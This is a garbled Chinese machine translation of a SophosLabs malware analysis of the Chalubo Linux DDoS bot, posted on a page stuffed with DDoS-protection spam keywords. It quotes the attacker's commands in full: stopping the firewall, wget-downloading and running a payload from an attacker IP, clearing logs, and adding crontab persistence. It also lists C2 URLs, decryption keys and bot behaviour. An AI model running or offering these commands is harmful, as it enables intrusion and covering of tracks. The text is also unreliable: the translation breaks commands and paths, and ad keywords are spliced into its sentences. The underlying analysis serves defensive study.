云盾高防采集_服务器防cc_无限

云盾高防采集_服务器防cc_无限

作者:蒂莫西·伊斯顿自9月初以来,SophosLabs一直在监视一种针对Linux系统上面向Internet的SSH服务器的攻击,该攻击正在丢弃一系列新发现的拒绝服务机器人,我们称之为Chalubo。攻击者使用ChaCha流密码对bot主组件及其对应的Lua脚本进行加密。这种反分析技术的采用证明了Linux恶意软件的发展,因为作者采用了Windows恶意软件更常见的原理来阻止检测。和它的一些前辈一样,Chalubo将异或DDoS以及Mirai恶意软件家族。当Chalubo下载程序在8月底开始传播时,攻击者在受害者的设备上发出了检索恶意软件的命令,该恶意软件实际上由三个组件组成:下载程序、主bot(仅在x86处理器体系结构的系统上运行)和Lua命令脚本。截至10月中旬,攻击者一直在发出检索Elknot dropper(检测为Linux/DDoS AZ)的命令,而Elknot dropper又提供Chalubo(chachachalua bot)包的其余部分。此外,我们现在看到了在不同处理器架构上运行的各种bot版本,包括32位和64位ARM、x86、x86_64、MIPS、MIPSEL和PowerPC。这可能意味着一个测试期的结束,我们可能会看到这个新家族的活动有所上升。攻击SophosLabs第一次发现Chalubo家族是因为我们对一个蜜罐的攻击,我们用它来收集恶意活动的数据。我们记录了2018年9月6日的攻击,机器人试图对SSH服务器暴力破解登录凭证;我们的蜜罐向攻击者呈现了一个接受各种凭证的真实外壳的外观。攻击者使用了root:管理员到得到一个壳…或者至少,他们是这么想的。一旦攻击者"访问"蜜罐服务器,他们就会发出以下命令。/etc/init.d/iptables停止关闭防火墙SuSEfirewall2停止reSuSEfirewall2停止查特-i/usr/bin/wgetchmod 755/usr/bin/wget公司yum安装-y wgetwget-c公司hxxp://117.21.191.108:8694/libsdes-P/usr/bin/chmod 777/usr/bin/libsdesnohup/usr/bin/libsdes>/dev/null 2>&1&导出历史文件=/dev/nullrm-f/var/log/wtmp历史-c这些类型的简单攻击我们的蜜罐是相当常见的,但使这突出的是利伯兹样本。与我们通常看到的由这些类型的攻击提供的标准Linux bot相比,这个bot显示出了更高的复杂性。攻击者不仅使用分层方法删除恶意组件,而且使用的加密不是我们通常在Linux恶意软件中看到的。顺便说一句,9月底,同一个攻击者的机器再次攻击了我们的蜜罐,但试图找回比尔盖茨恶意软件家族[Linux/DDoS BD],一些人将其归因于Elknot的作者。恶意样本来自地址hxxp://117.21.191.108:8269/开始。下载程序在第一次执行时,libsdes示例创建一个空文件/tmp/tmp.l以防止恶意软件多次执行。然后,bot将尝试将自己复制到/usr/bin/中,给自己一个随机的字母数字字符串作为文件名。有趣的是,它似乎复制了Mirai僵尸网络的rand_alphastr函数。此时,代码分叉。父进程设置多个持续点,以便恶意软件定期执行并在重新启动后能够存活。它通过将一个传统的init.d脚本添加到/etc/init.d/中,该脚本符号链接到/etc/rc[1..5].d/S90或/etc/rc.d/rc[1..5].d/S90。非常有趣的是,它还删除了一个具有可识别路径(/etc)的脚本文件/cron.小时/gcc4.sh)通过以下命令添加到/etc/crontab,每3分钟运行一次:sed-i'/\/等\/每小时一次\/gcc4.sh/d'/etc/crontab&&echo'*/3****root/etc/cron.小时/gcc4.sh'>>/etc/crontab脚本如下所示:#!/垃圾箱/垃圾箱路径=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/X11R6/bincp/lib/libudev4.so/lib/libudev4.so.6/lib/libudev4.so.6该脚本之所以有趣是因为它引用了以前归属于异或DDoS恶意软件系列(Sophos检测为Linux/DDoS BH)。删除此脚本的方式与异或DDoS家庭。实际上,仔细查看负责这里所有持久性部分的代码,Chalubo似乎已经从异或DDoS家庭。除了这些功能之外,还有其他一些小的相似之处,但这就是它的结尾。很明显,Chalubo的作者已经获得了异或DDoS但他们绝不是同一个家庭。子进程的第一个操作是将其进程名修改为crond或[kwarker/1:1],然后下载、解密、解压缩并运行下一个ELF二进制负载。最后修改的HTTP响应头将被检查,以确定是否应下载有效负载,我们记录的攻击显示,样本自2018年8月27日星期一09:57:30 GMT开始存在,一旦从网址:hxxp://q11333.top:8852/pc/i486它被送入chachacha解密例程。在被解密之后,有效负载被LZMA解压,然后由execve执行,使用修改后的进程名作为参数。加密Chalubo使用流密码chachacha,设置为20轮。在原始算法中,我们希望ChaCha使用16或32字节的密钥和8字节的nonce。此数据用于设置初始密钥状态,启用ddos攻击防御什么意思,以及一个空的16字节常量,根据密钥大小扩展16字节k或扩展32字节k,以及从开始的8字节计数器零。如果密钥是16字节,然后第二次使用它来填充初始密钥状态空间的32字节。但是,考虑到对等机的建议,有一个修改版本,将12字节的nonce与4字节的计数器一起使用,而不是原来的8字节nonce与8字节计数器一起使用,有些人将其称为chacha ietf。查查初始密钥状态为4×4矩阵,每个块代表4个字节expa公司nd␣32倍泰克钥匙钥匙钥匙钥匙钥匙钥匙钥匙钥匙计数计数现在现在 Chalubo中的ChaCha IETF实现将4字节计数器视为单独的参数。Chalubo初始密钥状态expa公司nd␣32倍泰克钥匙钥匙钥匙钥匙钥匙钥匙钥匙钥匙精氨酸现在现在现在 Chalubo实现将计数器初始化为从一(1)开始,免费ddos防御工具,而不是从零开始。上面提到的带有对等建议的RFC实际上声明"对于第一个nonce,计数器部分应该等于零,对于生成的每个连续nonce,计数器部分应该增加一个。但是,如果方便的话,ddos服务器防御,任何特定的计数器值都可以跳过,并且不在所使用的值序列中。"因此,考虑到它跳过了初始计数器零(0)值,这可以被视为一个标准实现,尽管它稍微有点与众不同。纵观各种实现,似乎每个人都对如何处理counter和nonce字段有自己的看法。大多数情况下不允许设置计数器,因此硬编码为从零开始。其他一些,比如Linux内核中的crypto API,将counter和nonce的最后16个字节作为一个输入参数,但是lib钠库将ChaCha IETF实现作为一个单独的参数——即使这样,参数的顺序也与我们在Chalubo中看到的不太一致。例如,ddos防御哪家便宜,以下是libnadium中的函数:int crypto_stream_chacha20_ietf_xor_ic(无符号字符*c,const unsigned char*m,无符号长隆姆林,const unsigned char*n,uint32\u t ic,const无符号字符*k);这是Chalubo中的同一个函数(如果我们重命名一些变量以匹配上面的例子中的变量):int crypto_stream_chacha20_ietf_xor_ic(const unsigned char*k,uint32_t ic,const无符号字符*n,const unsigned char*m,unsigned char*c,无符号long long mlen);因此,我们可以肯定地说chalubochacha函数是一个独特的实现,其算法与peer/IETF的建议相匹配。这是下载程序使用的恰恰键:fa 40 88 55 30 4c a1 99 f6 80 b4 94 b6 9e f4 73 dd 9c 5a 5e 0e 78 ba a4 44 04 8b 82 a8 bd 97 a9这是下载程序和主bot使用的ChaCha nonce:00 00 00 00 00 00 00 4a 00 00 00 01机器人一旦我们看了这个机器人,就很明显Chalubo从Mirai复制了一些代码片段,比如一些随机函数和util_local_addr函数的扩展形式。装配匹配Mirai僵尸网络的rand_init函数这个bot中的大部分功能代码都是全新的,主要是针对它们自己的Lua处理,主要是使用DNS、UDP和SYN风格执行DoS攻击。内置在bot中的Lua脚本是一个基本的控制脚本,用于调用C2服务器的home,ddos防御与入侵防护区别,以通知C2有关受感染机器的详细信息。与downloader阶段类似,将检查最后修改的HTTP响应头,并以从中检索的另一个Lua脚本的形式下载任务列表网址:hxxp://q11333.top:8852/测试/参考日期. 这个C2命令脚本也用ChaCha-IETF算法加密,因此Lua脚本调用函数task-decrypt。它使用与下载器相同的nonce,但命令脚本的键不同。主机器人使用的恰恰键:00 01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0f 10 11 12 13 14 15 16 17 18 19 1a 1b 1c 1d 1e 1f解密后的Lua脚本被送入一个名为create_task_group的函数,该函数执行该脚本。本地r、代码、标题、正文=http.get(当前任务url)[…剪断…]如果代码==200,则k

热门推荐
  • 美国高防_怎么防御ddos攻击_如何防

      公司将继续通过总务管理计划向联邦机构提供高度安全的综合通信解决方案美国总务管理局(GSA)已授予ATT购买服务。美国电......

    03-13    来源:长虹华伟

    分享
  • 网站安全防护_高仿包包哪里可以买_无限

      在全世界范围内,2020年肯定会有相当程度的心痛和动荡。在美国,过去几周的情况证明特别具有挑战性,这清楚地提醒我们......

    11-09    来源:长虹华伟

    分享
  • cdn防护_cc攻击防御量10万_免费试用

      也许你已经从今年经常被引用的Verizon数据泄露调查报告(VDBIR)中听到一些关键点。(或者你可能一直在想办法解决这个问题......

    03-01    来源:长虹华伟

    分享
  • ddos防攻击_cdn防御域名怎么解析_原理

      今天,NSS实验室发布了一份关于Web应用防火墙的比较分析报告。这份报告的发布可能会促使其他供应商发布热情洋溢的新闻稿......

    03-16    来源:长虹华伟

    分享
  • 高防cdn_ddos高防价格_免费测试

      网络安全尽职调查已成为并购交易的基本组成部分数据泄露和不遵守政府和行业标准可能会对公司造成多方面的影响,雅虎正......

    09-21    来源:长虹华伟

    分享
  • 香港高防cdn_福州高防_原理

      行业事件2012年3月5日布莱恩·凯利两件T恤,有人吗?我们的RSA Conference 2012 T恤似乎很受欢迎。我们想为他们提供更多的粉丝。......

    06-09    来源:长虹华伟

    分享
  • ddos怎么防_国内高防dns_新用户优惠

      消费者比以往任何时候都更了解情况,他们的偏好和行为也在不断变化。他们有着极高的期望值,要求个性化的服务,更多的......

    11-10    来源:长虹华伟

    分享
  • 香港高防_防高反的药_如何防

      我们已经对电脑病毒习以为常,但最新的WannaCrypt蠕虫攻击是一个星期五的惊喜,震惊了全世界。据欧洲警务机构欧洲刑警组......

    01-18    来源:长虹华伟

    分享
  • ddos防御_服务器安全狗防护验证页面_怎么

      Cisco IP电话中存在一个漏洞,允许未经身份验证的攻击者远程监听电话的音频流。根据Cisco在其网站上发布的一份咨询报告,......

    04-14    来源:长虹华伟

    分享
  • ddos高防ip_cc防御设置_方法

      我们发现的漏洞中有50%是超过4年的。几乎在所有情况下,这些易受攻击的软件组件的更新版本都可用。在一份新的报告中,......

    01-20    来源:长虹华伟

    分享
返回列表
Ctrl+D 将本页面保存为书签,全面了解最新资讯,方便快捷。